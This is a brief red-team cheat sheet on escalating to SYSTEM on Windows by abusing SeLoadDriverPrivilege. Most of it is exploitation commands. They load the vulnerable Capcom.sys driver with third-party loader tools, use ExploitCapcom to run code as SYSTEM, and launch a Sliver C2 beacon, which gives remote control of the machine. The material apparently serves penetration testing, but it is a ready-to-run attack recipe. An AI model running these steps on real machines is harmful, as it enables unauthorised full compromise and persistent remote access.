👾 Overview
The SeLoadDriverPrivilege allows a user to load drivers and execute code as SYSTEM. This can be coupled with a malicious driver to arbitrarily execute payloads on a machine.
🔍 Discovery
Requires a user with SeLoadDriverPrivilege enabled on a Windows Machine.
whoami /priv📌 Exploitation
Using k4sth4’s repo:
# Load malicious driver
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
# Test Exploit
.\ExploitCapcom.exe EXPLOIT whoami
# Pop a sliver beacon
.\ExploitCapcom.exe EXPLOIT beacon.exeUsing JoshMorrison99’s repo:
# Load the malicious driver
.\LoadDriver.exe System\CurrentControlSet\MyService {C:\Users\Test\Capcom.sys}
# Pop a sliver beacon
.\ExploitCapcom.exe C:\full\path\to\beacon.exe